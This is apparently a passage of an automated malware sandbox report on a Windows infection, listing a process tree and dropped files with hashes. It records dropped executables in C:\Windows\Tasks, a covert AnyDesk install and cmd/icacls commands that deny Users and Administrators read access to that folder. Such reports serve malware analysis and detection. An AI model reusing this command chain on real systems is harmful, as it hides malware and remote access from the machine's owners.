- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Windows\system32\werfault.exewerfault.exe /hc /shared Global\707a9263011d4b33ac926570f36e0936 /t 3620 /p 35801⤵
-
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\windows\tasks\Wmiic.exeC:\windows\tasks\Wmiic.exe1⤵
- Executes dropped EXE
-
C:\windows\tasks\IntelConfigService.exe"IntelConfigService.exe"2⤵
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious use of FindShellTrayWindow
-
C:\Windows\Tasks\Wrap.exeC:\Windows\Tasks\Wrap.exe3⤵
- Executes dropped EXE
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Windows\Tasks\ApplicationsFrameHost.exe" --daemonized4⤵
-
C:\Windows\Tasks\ApplicationsFrameHost.exeC:\Windows\Tasks\ApplicationsFrameHost.exe --daemonized5⤵
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Windows\Tasks /deny "Users:(R,REA,RA,RD)"3⤵
-
C:\Windows\system32\icacls.exeicacls C:\Windows\Tasks /deny "Users:(R,REA,RA,RD)"4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Windows\Tasks /deny "Administrators:(R,REA,RA,RD))"3⤵
-
C:\Windows\system32\icacls.exeicacls C:\Windows\Tasks /deny "Administrators:(R,REA,RA,RD))"4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Windows\Tasks /deny "%username%:(R,REA,RA,RD)"3⤵
-
C:\Windows\system32\icacls.exeicacls C:\Windows\Tasks /deny "IYMUGYHL$:(R,REA,RA,RD)"4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\Tasks\Superfetch.exeC:\Windows\Tasks\Superfetch.exe3⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
-
C:\Windows\Tasks\MSTask.exeC:\Windows\Tasks\MSTask.exe3⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
-
C:\Windows\TEMP\~Mp46F7.tmp\~Ma4650.exe"C:\Windows\TEMP\~Mp46F7.tmp\~Ma4650.exe" /p"C:\Windows\Tasks\MSTask.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies Internet Explorer settings
- Modifies data under HKEY_USERS
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 528 -p 5484 -ip 54841⤵
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files\Windows Mail\RuntimeBroker.exeFilesize
1.0MB
MD518557c37efdef82648622fa471a2db2f
SHA1e72f774a0bd16c3d7074a826f7f1711845738972
SHA25604142a2c4e3157a371266a5705959946268fc74b942597062e4dc3ce5f570c27
SHA512fa0a4e1f74806ff77ad71315d2fc4e008b74c0aac3fc8cbb7e6fe44278e0edde62f99c4d9c3aaff41bc134fc083fe73b638035382c279169f378b66a9bf09d9b
-
C:\Program Files\Windows Mail\RuntimeBroker.exeFilesize
1.0MB
MD518557c37efdef82648622fa471a2db2f
SHA1e72f774a0bd16c3d7074a826f7f1711845738972
SHA25604142a2c4e3157a371266a5705959946268fc74b942597062e4dc3ce5f570c27
SHA512fa0a4e1f74806ff77ad71315d2fc4e008b74c0aac3fc8cbb7e6fe44278e0edde62f99c4d9c3aaff41bc134fc083fe73b638035382c279169f378b66a9bf09d9b
-
C:\ProgramData\1.exeFilesize
775KB
MD50442a8479aa5f19dd5a64ddfd677b9f8
SHA1fa003104e8e8e6646049a49bd517224ba34ac4b6
SHA2565161a16217b9d8b9817ad1f6e1020e2eb625bbd6ccf82fbf9423077d0c966aa0
SHA51251ddbff08b54bbafd365e71432697bea5a3eb49bd87dafd477a059f59e1f2f2eaa8e465abda8499745a9a81c6e10a5c44a9a255d51d79d5e8a7b7c25709abe42
-
C:\ProgramData\AnyDesk\AnyDesk.exeFilesize
3.8MB
MD59a1d9fe9b1223273c314632d04008384
SHA1665cad3ed21f6443d1adacf18ca45dfaa8f52c99
SHA2560f4bf8506a2560c568b9815124dfc43a11c561ed611829df841ec7aba8302359
SHA5123ec400acd075a4078d7d9f06c853be4ee0fdd7a9d1628428326534df6c0f3ea8f745af9d29031e9259a1bee2f78dd48dfaebcb7e897c22736909a9d6b4f24ba5
-
C:\ProgramData\AnyDesk\AnyDesk.exeFilesize
3.8MB
MD59a1d9fe9b1223273c314632d04008384
SHA1665cad3ed21f6443d1adacf18ca45dfaa8f52c99
SHA2560f4bf8506a2560c568b9815124dfc43a11c561ed611829df841ec7aba8302359
SHA5123ec400acd075a4078d7d9f06c853be4ee0fdd7a9d1628428326534df6c0f3ea8f745af9d29031e9259a1bee2f78dd48dfaebcb7e897c22736909a9d6b4f24ba5
-
C:\ProgramData\AnyDesk\AnyDesk.exeFilesize
3.8MB
MD59a1d9fe9b1223273c314632d04008384
SHA1665cad3ed21f6443d1adacf18ca45dfaa8f52c99
SHA2560f4bf8506a2560c568b9815124dfc43a11c561ed611829df841ec7aba8302359
SHA5123ec400acd075a4078d7d9f06c853be4ee0fdd7a9d1628428326534df6c0f3ea8f745af9d29031e9259a1bee2f78dd48dfaebcb7e897c22736909a9d6b4f24ba5
-
C:\ProgramData\AnyDesk\AnyDesk.exeFilesize
3.8MB
MD59a1d9fe9b1223273c314632d04008384
SHA1665cad3ed21f6443d1adacf18ca45dfaa8f52c99
SHA2560f4bf8506a2560c568b9815124dfc43a11c561ed611829df841ec7aba8302359
SHA5123ec400acd075a4078d7d9f06c853be4ee0fdd7a9d1628428326534df6c0f3ea8f745af9d29031e9259a1bee2f78dd48dfaebcb7e897c22736909a9d6b4f24ba5
-
C:\ProgramData\AnyDesk\AnyDesk.exeFilesize
3.8MB
MD59a1d9fe9b1223273c314632d04008384
SHA1665cad3ed21f6443d1adacf18ca45dfaa8f52c99
SHA2560f4bf8506a2560c568b9815124dfc43a11c561ed611829df841ec7aba8302359
SHA5123ec400acd075a4078d7d9f06c853be4ee0fdd7a9d1628428326534df6c0f3ea8f745af9d29031e9259a1bee2f78dd48dfaebcb7e897c22736909a9d6b4f24ba5
-
C:\ProgramData\AnyDesk\service.confFilesize
2KB
MD56e61581eecf8dea89f43a73a9b87a330
SHA1845b02e9174c3f97209354748688f11f3869d2c9
SHA2561785d98e7e970fff4e5cff941f2458f037fc8a208bbe35d4832b6fb499daa71d
SHA5128682a22f658923466d121ece735c38b720644e1c388517fcc09c27852a63bca80ea834e23e6b0132aab95f16574be8f23f9a8bf4e923ba070cee7d494451d99f
-
C:\ProgramData\AnyDesk\service.confFilesize
3KB
MD52ab3e2349fc101d1ad538d964b62828b
SHA16136fcdadfce7e51967ca5c2f827994e475239b2
SHA256d0f545fd5af5acc7bbdada0e0e521fb38e8eb81916a00b29f4b35cee713f8b8f
SHA512112fb4df5c329f56e96d0aa2bb228d56532edab4c64f8dd5ca46aa96b74ce6586cce437b27e480a4340476ff8efffed417b6aa575edf129020834933833d5d3a
-
C:\ProgramData\AnyDesk\system.confFilesize
370B
MD5afdc4f69f4720b8c4153f6186f49a2b6
SHA1329c27ea36d7913809b0c239bb58e91d2ee468ac
SHA2569a218849d74b0ca75ef719b0cab59b40529b958097eb0b0b8527b09bc293a571
SHA5123a8a6e1994a681a12875b820eb7ca78b6c035a1489c4d8648590424dbec3152e6831ac0c4a73560968231c9b45db869dad189109fb1ecb4a3159258e0099a7de
-
C:\ProgramData\AnyDesk\system.confFilesize
837B
MD57810eb17f6050e94aad5fd1790a6a928
SHA15eec47257a6a12a6e05e432fc51676192ba59084
SHA25637d69c7079c48ed90bbdfcc6a4cfe11f21aa95adcacadf66838ffd6558434da2
SHA512de41cfa107a6b6ebb48c39f2ffd64193e230fcb278678b0cb4bf04ba927d4085b3abd28d12dfccb7776420e95c7c0439ecf9b21edabeeb58d268fe265a620639
-
C:\ProgramData\AnyDesk\system.confFilesize
1KB
MD522b75a52e904bdb75204cc5c269704ea
SHA1934213cc8872285ce4b7dc95b2457b39a2f47b05
SHA2568c1a3f1ee093792151aa28a191de1faa5da7fa18d6eb0f8c0fb331a1076af723
SHA512bd8cbb2942993e946aa690a20f4eab6f1cde9a96c4bf1134c5be974407d51433bbbab5732f07e04a6375ccce71c50ab5a92707d38c1560f3838167d9061f1e59
-
C:\ProgramData\any.exeFilesize
6.1MB
MD583834462455be62ccf135f3137263119
SHA1f23d183db2adf37e80469191c7d452e8d39935b6
SHA256565c7756135d7858e8963928fff8d1fdb99a452d8568319aeda4a073f51d0a23
SHA5127aa6374b4bafae925a1da59212fdb7f262f98848c058173777c0f30c61243b982cfc3d13ce106e9eb59cfb9957c81a5b496e82a5522e9209f0c30f53f864c411
-
C:\ProgramData\curl.exeFilesize
5.2MB
MD5104023cef829fce3e34bf1514daff629
SHA1b6e7b949109298ec7ff1aa64404a859b5b41ccae
SHA25615b1158d806de14013fdc3f0e81dca725481d2393249994a122c0a70721ae9f5
SHA512efebee49ffebf0dcb07c6e7d24477101a7c8a2a03b0bea4df9c1054943823026ffd46f54cc51fb8de062e3641f021d5cf0b23ed67d46a549ee23e5fa7b12be1e
-
C:\ProgramData\dc.exeFilesize
1.3MB
MD5dae7ec3880731dcd27311b4e1dab5e49
SHA152d88c8917cbbe4c40bf2e3a67ef8eaad2b52ffc
SHA25659a058a95f24d57c98b1801a1bc1e1545db8be230a628e2f7dcc34c0452f2d19
SHA5128064f3819c815db7cafe243de781bd7755f208ea932f383687421ecd56d610c1929426f6ca55b592e51147386f2ece42bc9b2ebb5a208381a510f9dd88d6e5da
-
C:\ProgramData\migrate.exeFilesize
6.6MB
MD54d877cab8a19afea517ba4436805ce77
SHA17210160bd527a3b726ad0686613bff358823de41
SHA256e2eee92ef0ffc25134049dd0301d464bf8e7b814ba04b25749dea8c0b7cbc29d
SHA512af9ce52af8d3a6987eb50fd17cbae170195872e8ca2d65db5198842f185d4cba2b70e9d2d0e9cdeb1cb80bd1adaf1674eec84797d65a8c2e236b18261fe018bc
-
C:\ProgramData\wsappz.exeFilesize
3.8MB
MD59a1d9fe9b1223273c314632d04008384
SHA1665cad3ed21f6443d1adacf18ca45dfaa8f52c99
SHA2560f4bf8506a2560c568b9815124dfc43a11c561ed611829df841ec7aba8302359
SHA5123ec400acd075a4078d7d9f06c853be4ee0fdd7a9d1628428326534df6c0f3ea8f745af9d29031e9259a1bee2f78dd48dfaebcb7e897c22736909a9d6b4f24ba5
-
C:\ProgramData\wsappz.exeFilesize
3.8MB
MD59a1d9fe9b1223273c314632d04008384
SHA1665cad3ed21f6443d1adacf18ca45dfaa8f52c99
SHA2560f4bf8506a2560c568b9815124dfc43a11c561ed611829df841ec7aba8302359
SHA5123ec400acd075a4078d7d9f06c853be4ee0fdd7a9d1628428326534df6c0f3ea8f745af9d29031e9259a1bee2f78dd48dfaebcb7e897c22736909a9d6b4f24ba5
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.logFilesize
2KB
MD5968cb9309758126772781b83adb8a28f
SHA18da30e71accf186b2ba11da1797cf67f8f78b47c
SHA25692099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a
SHA5124bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
18KB
MD5dd9387fad9deacce7176686aecd89fc2
SHA1a91869ac70a4b00cceb527834ebd812cba5a66ff
SHA25643d31b1cc0c249ec8c911b5451dccbecc32e143360690b9fe2faa770decaa29b
SHA512ce60ed8032fc8dc5452cf2b0b04c2fb1e0ef034dddca66372a7c8789357858ea596c4a1b3ba94597a550edfff55c73594bd75d7cf0562dc4137bb0ea5384510d
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
18KB
MD5899a6c41b91a77f3d1e7fd5e03830794
SHA1eeaa464ae836e92049bae6644569b39e51bab13b
SHA256f1068e020ca2de9e5a6107c58593d48cdf7e6e7aaeac4032a996b0dcaaf404a0
SHA512085ce1ed09cca25af7c0833dd8865d0abcf30607bb4ab98f88a56b541cb1938264a9e801a36fa06107405582529f0b41a4be250cd88acc21de8cab704b9ceb85
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
18KB
MD5761db6af99dd6c9f14d915f24fb74c82
SHA15e84e146b154b9ff6d099b808bbe11e73fc8c3fe
SHA256bdf59790c507e26925699ebdb2f220abb11e0a30d79a83f09d2ea65418ac1d97
SHA512ec4673f64f909261015cdb93ab52930a5d005af962f5cace96df0487307b1b5b74dc4a6ee11eee4b6de06305d82c178336ce071f78167c7731e8e2098dc23382
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
944B
MD59b80cd7a712469a4c45fec564313d9eb
SHA16125c01bc10d204ca36ad1110afe714678655f2d
SHA2565a9e4969c6cdb5d522c81ce55799effb7255c1b0a9966a936d1dc3ff8fe2112d
SHA512ac280d2623c470c9dec94726a7af0612938723f3c7d60d727eb3c21f17be2f2049f97bc8303558be8b01f94406781ece0ada9a3bc51e930aff20bebb6ca17584
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
944B
MD59b80cd7a712469a4c45fec564313d9eb
SHA16125c01bc10d204ca36ad1110afe714678655f2d
SHA2565a9e4969c6cdb5d522c81ce55799effb7255c1b0a9966a936d1dc3ff8fe2112d
SHA512ac280d2623c470c9dec94726a7af0612938723f3c7d60d727eb3c21f17be2f2049f97bc8303558be8b01f94406781ece0ada9a3bc51e930aff20bebb6ca17584
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
944B
MD59b80cd7a712469a4c45fec564313d9eb
SHA16125c01bc10d204ca36ad1110afe714678655f2d
SHA2565a9e4969c6cdb5d522c81ce55799effb7255c1b0a9966a936d1dc3ff8fe2112d
SHA512ac280d2623c470c9dec94726a7af0612938723f3c7d60d727eb3c21f17be2f2049f97bc8303558be8b01f94406781ece0ada9a3bc51e930aff20bebb6ca17584
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
944B
MD59b80cd7a712469a4c45fec564313d9eb
SHA16125c01bc10d204ca36ad1110afe714678655f2d
SHA2565a9e4969c6cdb5d522c81ce55799effb7255c1b0a9966a936d1dc3ff8fe2112d
SHA512ac280d2623c470c9dec94726a7af0612938723f3c7d60d727eb3c21f17be2f2049f97bc8303558be8b01f94406781ece0ada9a3bc51e930aff20bebb6ca17584
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
944B
MD59b80cd7a712469a4c45fec564313d9eb
SHA16125c01bc10d204ca36ad1110afe714678655f2d
SHA2565a9e4969c6cdb5d522c81ce55799effb7255c1b0a9966a936d1dc3ff8fe2112d
SHA512ac280d2623c470c9dec94726a7af0612938723f3c7d60d727eb3c21f17be2f2049f97bc8303558be8b01f94406781ece0ada9a3bc51e930aff20bebb6ca17584
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
944B
MD59b80cd7a712469a4c45fec564313d9eb
SHA16125c01bc10d204ca36ad1110afe714678655f2d
SHA2565a9e4969c6cdb5d522c81ce55799effb7255c1b0a9966a936d1dc3ff8fe2112d
SHA512ac280d2623c470c9dec94726a7af0612938723f3c7d60d727eb3c21f17be2f2049f97bc8303558be8b01f94406781ece0ada9a3bc51e930aff20bebb6ca17584
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
944B
MD59b80cd7a712469a4c45fec564313d9eb
SHA16125c01bc10d204ca36ad1110afe714678655f2d
SHA2565a9e4969c6cdb5d522c81ce55799effb7255c1b0a9966a936d1dc3ff8fe2112d
SHA512ac280d2623c470c9dec94726a7af0612938723f3c7d60d727eb3c21f17be2f2049f97bc8303558be8b01f94406781ece0ada9a3bc51e930aff20bebb6ca17584
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
944B
MD59b80cd7a712469a4c45fec564313d9eb
SHA16125c01bc10d204ca36ad1110afe714678655f2d
SHA2565a9e4969c6cdb5d522c81ce55799effb7255c1b0a9966a936d1dc3ff8fe2112d
SHA512ac280d2623c470c9dec94726a7af0612938723f3c7d60d727eb3c21f17be2f2049f97bc8303558be8b01f94406781ece0ada9a3bc51e930aff20bebb6ca17584
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
944B
MD59b80cd7a712469a4c45fec564313d9eb
SHA16125c01bc10d204ca36ad1110afe714678655f2d
SHA2565a9e4969c6cdb5d522c81ce55799effb7255c1b0a9966a936d1dc3ff8fe2112d
SHA512ac280d2623c470c9dec94726a7af0612938723f3c7d60d727eb3c21f17be2f2049f97bc8303558be8b01f94406781ece0ada9a3bc51e930aff20bebb6ca17584
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
944B
MD59b80cd7a712469a4c45fec564313d9eb
SHA16125c01bc10d204ca36ad1110afe714678655f2d
SHA2565a9e4969c6cdb5d522c81ce55799effb7255c1b0a9966a936d1dc3ff8fe2112d
SHA512ac280d2623c470c9dec94726a7af0612938723f3c7d60d727eb3c21f17be2f2049f97bc8303558be8b01f94406781ece0ada9a3bc51e930aff20bebb6ca17584
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
944B
MD59b80cd7a712469a4c45fec564313d9eb
SHA16125c01bc10d204ca36ad1110afe714678655f2d
SHA2565a9e4969c6cdb5d522c81ce55799effb7255c1b0a9966a936d1dc3ff8fe2112d
SHA512ac280d2623c470c9dec94726a7af0612938723f3c7d60d727eb3c21f17be2f2049f97bc8303558be8b01f94406781ece0ada9a3bc51e930aff20bebb6ca17584
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
944B
MD59b80cd7a712469a4c45fec564313d9eb
SHA16125c01bc10d204ca36ad1110afe714678655f2d
SHA2565a9e4969c6cdb5d522c81ce55799effb7255c1b0a9966a936d1dc3ff8fe2112d
SHA512ac280d2623c470c9dec94726a7af0612938723f3c7d60d727eb3c21f17be2f2049f97bc8303558be8b01f94406781ece0ada9a3bc51e930aff20bebb6ca17584
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
11KB
MD53c937e8cc752b64264b8c90ba3f22da0
SHA148194ff40061c41eac4894e1d1a0edf09cafa2f4
SHA2561878433ba808624497464f82f7dcd3f8cbcbbda4a17133dba108d2691253abe0
SHA512cbdfe5e92e253a13968a2f0b6fdd3d2aa43b6e4cc1639c9ae49028efc8d6c08763310bc6e56c665ae31d7deff0623b06d1fd590169a0dcf292d6d908151ee8c7
-
C:\Users\Admin\AppData\Local\Temp\7peWjKJuHe.batFilesize
212B
MD53b36affa9eccf95321997c3d7fa560d6
SHA1532f6660b3d21b072ec01225247a052d55c25590
SHA256c9bd8ebebe135c0e95ed237947bb33c35837b31c8333017cc31154dc5dc49b89
SHA51211fced87605eadf29693959aebc9702aeca5014d5c09d916c395c296e3d4e6062fe4c1ebc491a5c7ba47f223a01176f418ef41d61e0599e2c41843fb2e4ea99b
-
C:\Users\Admin\AppData\Roaming\AnyDesk\ad.traceFilesize
5KB
MD5a5fd03ebb6097b1056d90baa74f4009d
SHA12e40be8571beb26266b61151fd916cdced6ee791
SHA25607a177ae85a4661ac4d41ec1b1cf8b3eec5c4e8c8f5f20871f9bc5e462a97990
SHA5120face3ef781fb750e791470e763dc55927f9955ce851abc11672befdf691044a83b79389ac5d755527409ed38c4d044aee5a9c8847d00e5d03e89da41ecd1f71
-
C:\Users\Admin\AppData\Roaming\AnyDesk\ad.traceFilesize
9KB
MD576d51754ca5d49602fd86ef73adb758b
SHA130a7490931a3cc2fc6ccf73b4837f3c70602b9eb
SHA2562d1870d9a2fa051080f814096bd2ddcd341024a9ebdd3ab3e4cdb4ead379cab1
SHA5123511466b498828be97e83e7eb8c503d4f8d545e9c93eeadff35b03020ead54a7b23ed478a0a9d15a00557bd6034bae5041096377ca03dfa12f4a943c86f8d6b3
-
C:\Users\Admin\AppData\Roaming\AnyDesk\user.confFilesize
5KB
MD5f519b7221174b4edfc36e8fb44e3c058
SHA1a95c7f81f24e13b2d1a68530dd57eaa3a1c545c6
SHA256fc063af88815e525dcb0ef1e91acc263fd4c851b89a1dedc75b282e166a78ad6
SHA512d98df8932eeb35dfe5c4791cf919749469f853b5d73d7bee65f07e940352793c554798074f378c6375852b3cf1c7412bef33291e2ccac597d31788fbe02820b8
-
C:\Users\Admin\AppData\Roaming\AnyDesk\user.confFilesize
5KB
MD54dd2e56aac35dfd7ced739a1d4cabad2
SHA1979ee73ac2704c7b1fcde18fc446ecbde74a84b6
SHA256f5617d9cf657d34dab50cbeb30ee160e1e8757555fd30b2e6035ec4d8c31e55b
SHA512306b4bd0491cbc2ceec8adf3541c569e2bd80b6cc7b051b0d346cb69ce5c89119bcde5822e06f53ebbba0f5fe47b85a87b7471efc986f4a3904b28d56deb0371
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msFilesize
6KB
MD56ded28fe8c0f1fc926c680c8de0d2fc3
SHA15429fea17e8e9014cb6a6f478071eb18753aaf28
SHA2562bad92d08c31641ccc02e9ca2f8bd86d0dcc2b864b28fcc1f30f55a563216592
SHA5123b427808f2b91bac18a01dbeae2f6fc9ab7a771e818d2bde70ae386161bdb096e4bcd0ae8c45e78b3deaf513a2904a21766f5a10190b8b2415a369f51e8677b2
-
C:\Windows\Tasks\IntelConfigService.exeFilesize
1.8MB
MD558e4115267b276452edc1f541e3a8198
SHA1ec40b6cce5c9a835563c17da81997e8010ac9cad
SHA256713120bac7807f6fc0a6050135556c0614a66be2fb476cfe163877f3d03b4d08
SHA5123def4b7f7fbeab01826eb733174bca64860f8bfbad3baec361b65b07b4558e28830fcc2deb264622199f9474277f04e562830bc5f0bf8a0e7932d002f1a812c5
-
C:\Windows\Tasks\Wmiic.exeFilesize
365KB
MD5a18bfe142f059fdb5c041a310339d4fd
SHA18ab2b0ddc897603344de8f1d4cc01af118a0c543
SHA256644c9745d1d2f679db73fcb717dd37e180e19d5b0fc74575e4cefe4f543f2768
SHA512c30d46781b17c4bb0610d3af4b5acc223394d02f9fbb1fbb55811ae2efe49fd29a7e9626737c4b24194c73c58fe1b577a858559a7e58d93c3660ac680f19eaf8
-
C:\Windows\Tasks\Wmiic.exeFilesize
365KB
MD5a18bfe142f059fdb5c041a310339d4fd
SHA18ab2b0ddc897603344de8f1d4cc01af118a0c543
SHA256644c9745d1d2f679db73fcb717dd37e180e19d5b0fc74575e4cefe4f543f2768
SHA512c30d46781b17c4bb0610d3af4b5acc223394d02f9fbb1fbb55811ae2efe49fd29a7e9626737c4b24194c73c58fe1b577a858559a7e58d93c3660ac680f19eaf8
-
C:\Windows\Tasks\Wmiic.exeFilesize
365KB
MD5a18bfe142f059fdb5c041a310339d4fd
SHA18ab2b0ddc897603344de8f1d4cc01af118a0c543
SHA256644c9745d1d2f679db73fcb717dd37e180e19d5b0fc74575e4cefe4f543f2768
SHA512c30d46781b17c4bb0610d3af4b5acc223394d02f9fbb1fbb55811ae2efe49fd29a7e9626737c4b24194c73c58fe1b577a858559a7e58d93c3660ac680f19eaf8
-
C:\programdata\1.exeFilesize
775KB
MD50442a8479aa5f19dd5a64ddfd677b9f8
SHA1fa003104e8e8e6646049a49bd517224ba34ac4b6
SHA2565161a16217b9d8b9817ad1f6e1020e2eb625bbd6ccf82fbf9423077d0c966aa0
SHA51251ddbff08b54bbafd365e71432697bea5a3eb49bd87dafd477a059f59e1f2f2eaa8e465abda8499745a9a81c6e10a5c44a9a255d51d79d5e8a7b7c25709abe42
-
C:\programdata\any.batFilesize
2KB
MD57189281b9182a9a412a92af69b77c836
SHA1d98322de39d62e8d5e6f8fb7fe2ce30f578a4853
SHA256baae6af47a9b83c57269d62cf17e4d68927adee93e5567ce2bb5ae33cbe845eb
SHA512211be9213611bdbd44b2dac2462d0688c02f352c6c55cc6602d84b0a8ceff9a96ca79f6989ce825c8ecedf65fb13e6583fb92fb56c551bf61948320f12cbb6be
-
C:\programdata\any.exeFilesize
6.1MB
MD583834462455be62ccf135f3137263119
SHA1f23d183db2adf37e80469191c7d452e8d39935b6
SHA256565c7756135d7858e8963928fff8d1fdb99a452d8568319aeda4a073f51d0a23
SHA5127aa6374b4bafae925a1da59212fdb7f262f98848c058173777c0f30c61243b982cfc3d13ce106e9eb59cfb9957c81a5b496e82a5522e9209f0c30f53f864c411
-
C:\programdata\dc.exeFilesize
1.3MB
MD5dae7ec3880731dcd27311b4e1dab5e49
SHA152d88c8917cbbe4c40bf2e3a67ef8eaad2b52ffc
SHA25659a058a95f24d57c98b1801a1bc1e1545db8be230a628e2f7dcc34c0452f2d19
SHA5128064f3819c815db7cafe243de781bd7755f208ea932f383687421ecd56d610c1929426f6ca55b592e51147386f2ece42bc9b2ebb5a208381a510f9dd88d6e5da
-
C:\programdata\ru.batFilesize
32B
MD511e08b5abf3f1675f99c96f78c128b23
SHA140d6dd08262ef959328aec4dc5ed07532232037c
SHA25650ac09332ff9d6521244b4f9cf6fd9cc489b3324ed1316e07f6a5904230397e7
SHA5123005767016b4c5da031fb2ac5288b01821d54768b5e099e1157d4fa4621a078d589e54d9c5c89ded58ac3ca94395dacbf1d840f9210f909d3c9dfe8092de8ff9
-
C:\runtimeMonitor\ComdriverSvc.exeFilesize
1.0MB
MD518557c37efdef82648622fa471a2db2f
SHA1e72f774a0bd16c3d7074a826f7f1711845738972
SHA25604142a2c4e3157a371266a5705959946268fc74b942597062e4dc3ce5f570c27
SHA512fa0a4e1f74806ff77ad71315d2fc4e008b74c0aac3fc8cbb7e6fe44278e0edde62f99c4d9c3aaff41bc134fc083fe73b638035382c279169f378b66a9bf09d9b
-
C:\runtimeMonitor\ComdriverSvc.exeFilesize
1.0MB
MD518557c37efdef82648622fa471a2db2f
SHA1e72f774a0bd16c3d7074a826f7f1711845738972
SHA25604142a2c4e3157a371266a5705959946268fc74b942597062e4dc3ce5f570c27
SHA512fa0a4e1f74806ff77ad71315d2fc4e008b74c0aac3fc8cbb7e6fe44278e0edde62f99c4d9c3aaff41bc134fc083fe73b638035382c279169f378b66a9bf09d9b
-
C:\runtimeMonitor\PsYm20I.batFilesize
36B
MD513e52857c334ca3b14c44cffece40607
SHA1eaa9d704385cec30f7841ef6d3c051b225007dbe
SHA2564e457ab29e89a42a805b427decc8e571e15d857061c939ee7aa8d0bcaff25a6c
SHA5124b0c23faad00995254ae02b5ce55de33344f66120f1e8640d80059d7cf77f3b149c46ae24bdd459881ef332331cc59e6fc50e55c1fa1a585f63dbf5badb93337
-
C:\runtimeMonitor\eW0NlR3z8rHah1r0tet2KhNAo.vbeFilesize
198B
MD5f3fbd4e6a0097ff2d729be2b6e494e80
SHA1abed54083af60944e4628718061fa6b9ce402594
SHA256b7d74a96173fd177dceead637138814738b68799b018437dbd4ba20213977e56
SHA512f9a7f899cdc423a3214072de0a2858f212e15d9055b22cbb8536d20cea3fe199e3f44f3183c6d3e41e85a04b2b47e0497ead13eeb49e67f91e44cb19fe4a0f57
-
C:\windows\tasks\IntelConfigService.exeFilesize
1.8MB
MD558e4115267b276452edc1f541e3a8198
SHA1ec40b6cce5c9a835563c17da81997e8010ac9cad
SHA256713120bac7807f6fc0a6050135556c0614a66be2fb476cfe163877f3d03b4d08
SHA5123def4b7f7fbeab01826eb733174bca64860f8bfbad3baec361b65b07b4558e28830fcc2deb264622199f9474277f04e562830bc5f0bf8a0e7932d002f1a812c5
-
C:\windows\tasks\Wmiic.exeFilesize
365KB
MD5a18bfe142f059fdb5c041a310339d4fd
SHA18ab2b0ddc897603344de8f1d4cc01af118a0c543
SHA256644c9745d1d2f679db73fcb717dd37e180e19d5b0fc74575e4cefe4f543f2768
